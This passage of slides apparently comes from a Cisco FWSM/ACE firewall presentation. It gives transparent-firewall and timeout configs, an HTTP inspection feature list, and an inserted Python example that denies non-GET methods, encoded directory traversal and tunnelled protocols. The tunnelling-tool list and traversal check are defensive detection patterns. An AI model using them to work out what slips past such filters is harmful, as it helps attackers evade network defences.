  access-group input blue
  no shutdown
interface bvi 1
  ip address 12.20.40.6 255.255.255.0
  alias 12.20.40.8 255.255.255.0
  peer ip address 12.20.40.7 255.255.255.0
  no shutdown
ip route 0.0.0.0 0.0.0.0 12.20.40.1

FWSM 3.1

firewall transparent
access-list BPDU ethertype permit bpdu
access-list blue extended permit ip any any
interface Vlan104
  nameif outside
  bridge-group 1
  security-level 0
interface Vlan40
  nameif inside
  bridge-group 1
  security-level 100
interface BVI1
  ip address 12.20.40.4 255.255.255.0 standby 12.20.40.5
access-group BPDU in interface outside
access-group blue in interface outside
access-group BPDU in interface inside
access-group blue in interface inside
route outside 0.0.0.0 0.0.0.0 12.20.40.1 1

• Both contexts bridge two VLANs (bridge-group 1) and apply the ACLs on the bridged interfaces. The BPDU ethertype ACL is needed because a transparent firewall drops non-IP frames it has not been told to pass, and without it spanning tree cannot see across the bridge; "blue" is the stateful IP policy, shown here as permit ip any any as a placeholder to be tightened per application.

Page 44:

Inspection Compared

Page 45:

HTTP Inspection

• RFC 2616 compliance and filtering
– Protocol conformance: the first line of a request must be "Method SP Request-URI SP HTTP-Version" and that of a response "HTTP-Version SP Status-Code SP Reason-Phrase", etc.
– De-obfuscation: defeats attempts to evade regex matches by encoding the URL (the request is decoded before the match is made)
– Methods: OPTIONS, GET, POST, HEAD, PUT, DELETE, TRACE, CONNECT
– Extensions: INDEX, MOVE, MKDIR, COPY, EDIT, UNEDIT, SAVE, LOCK, UNLOCK, REVLABEL, REVLOG, REVNUM, SETATTRIBUTE, GETATTRIBUTE, GETATTRIBUTENAMES, GETPROPERTIES, STARTREV, STOPREV

• Length and encoding checks
– Length: configurable range for the URL and for header fields, in requests and responses
– Encoding: chunked | compress | deflate | gzip | identity

• Detect HTTP misuse
– Peer-to-peer (P2P) applications: Kazaa, Gnutella
– Tunnelling applications: HTTPort/HTTHost, FireThru
– Instant messaging: Yahoo Messenger

• MIME type validation and filtering (ACE only)
– Audio: /*, /midi, /basic, /mpeg, /x-adpcm, /x-aiff, /x-ogg, /x-wav (8)
– Image: /*, /cgf, /gif, /jpeg, /png, /tiff, /x-3ds, /x-bitmap, /x-niff, /x-portable, /x-xpm (11)
– Text: /*, /css, /html, /plain, /richtext, /sgml, /xmcd, /xml (8)
– Video: /*, /flc, /mpeg, /quicktime, /sgi, /x-avi, /x-fli, /x-mng, /x-msvideo (9)
– Application: /msword, /octet-stream, /pdf, /postscript, /vnd.ms-excel, /vnd.ms-powerpoint, /x-gzip, /x-java-archive, /x-java-vm, /zip (10)

• Regex filtering on HTTP messages (ACE only)
– Detect a protocol running on top of HTTP, e.g. to detect Yahoo Messenger look for "YMSG" in the first 4 bytes of the message body

Page 46:

HTTP Inspection Ex.—Allow Only GETs
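What an "allow only GETs" inspection policy decides, as an added Python example that is not from the original presentation and is not ACE or FWSM configuration: it applies the checks from the previous slide (request and status-line conformance, method allow-list, URL length, percent-decoding before the traversal match, encoding and MIME allow-lists, and a regex for the YMSG handshake in the first four bytes of the body) to raw HTTP messages. The `POLICY` table and the `inspect` function are this example's own; the decoding step is plain percent-decoding and does not cover overlong UTF-8 forms.

```python
import re
from urllib.parse import unquote

# Inspection policy for this example (constructed): only GET, a bounded URL,
# the five encodings from the slide, a short MIME allow-list, and a regex for
# the Yahoo Messenger handshake at the start of the body.
POLICY = {
    "methods": {"GET"},
    "max_url_len": 1024,
    "encodings": {"chunked", "compress", "deflate", "gzip", "identity"},
    "mime_allow": {"text/html", "text/plain", "text/css", "image/gif",
                   "image/jpeg", "image/png", "application/pdf"},
    "body_regex": re.compile(rb"^YMSG"),
}
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d)\.(\d)$")
STATUS_LINE = re.compile(r"^HTTP/(\d)\.(\d) (\d{3}) (.*)$")


def _parse(raw):
    """Split a raw HTTP message into (start line, lower-cased headers, body).
    Raises ValueError on a header line without a name or a colon."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for field in lines[1:]:
        name, colon, value = field.partition(":")
        if not colon or not name.strip():
            raise ValueError(f"malformed header line {field!r}")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect(raw, policy=POLICY):
    """Return ('permit', 'ok') or ('deny', reason) for one request or response."""
    try:
        start, headers, body = _parse(raw)
    except ValueError as err:
        return "deny", f"protocol conformance: {err}"
    if start.startswith("HTTP/"):                       # a response
        if not STATUS_LINE.match(start):
            return "deny", "protocol conformance: bad status line"
    else:                                               # a request
        m = REQUEST_LINE.match(start)
        if not m:
            return "deny", "protocol conformance: bad request line"
        method, url = m.group(1), m.group(2)
        if method not in policy["methods"]:
            return "deny", f"method {method} not permitted"
        if len(url) > policy["max_url_len"]:
            return "deny", "URL too long"
        # De-obfuscation: match on the decoded form, not the wire form.
        if "../" in unquote(url).replace("\\", "/"):
            return "deny", "directory traversal after de-obfuscation"
    for hdr in ("transfer-encoding", "content-encoding"):
        for token in headers.get(hdr, "").split(","):
            token = token.strip().lower()
            if token and token not in policy["encodings"]:
                return "deny", f"encoding {token} not permitted"
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype and ctype not in policy["mime_allow"]:
        return "deny", f"MIME type {ctype} not permitted"
    if policy["body_regex"].match(body):
        return "deny", "tunnelled protocol detected in message body"
    return "permit", "ok"


if __name__ == "__main__":
    # Constructed sample messages for a quick run.
    samples = [
        b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
        b"POST /upload HTTP/1.1\r\nHost: x\r\nContent-Length: 3\r\n\r\nabc",
        b"GET /notify HTTP/1.0\r\nHost: m\r\n\r\nYMSG\x00\x10\x00\x00",
        b"HTTP/1.1 200 OK\r\nContent-Type: application/x-msdownload\r\n\r\nMZ",
    ]
    for msg in samples:
        print(msg.split(b"\r\n", 1)[0].decode(), "->", inspect(msg))
```

The method check alone is what the slide title asks for; the rest is what makes the check meaningful, since a TRACE or a percent-encoded traversal would otherwise pass a naive "starts with GET" rule.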

Page 47:

Timeouts per Flow

FWSM 3.1

class-map TN3270-class
  match port tcp eq 23
policy-map TN3270-policy
  class TN3270-class
    set connection timeout embryonic 0:00:30 half-closed 0:10:00 tcp 24:00:00
service-policy TN3270-policy interface inside

ACE

parameter-map type connection TN3270
  set timeout inactivity 86400
class-map match-all TN3270-class
  2 match port tcp eq telnet
policy-map multi-match TN3270-policy
  class TN3270-class
    connection advanced-options TN3270
interface vlan 307
  service-policy input TN3270-policy

• Both configurations raise the idle timeout for TN3270 terminal sessions (long-lived, mostly idle connections on port 23) to 24 hours (86400 seconds) so the firewall does not tear the flow down while the terminal sits idle. Note that the FWSM keeps the embryonic (half-open) timeout at 30 seconds, so a SYN flood against the same port gains nothing from the longer idle timer.

Page 48:

Private VLANs with Service Modules

Page 49:

Role-Based Access with ACE

Page 50:

Customizing Roles and Domains with ACE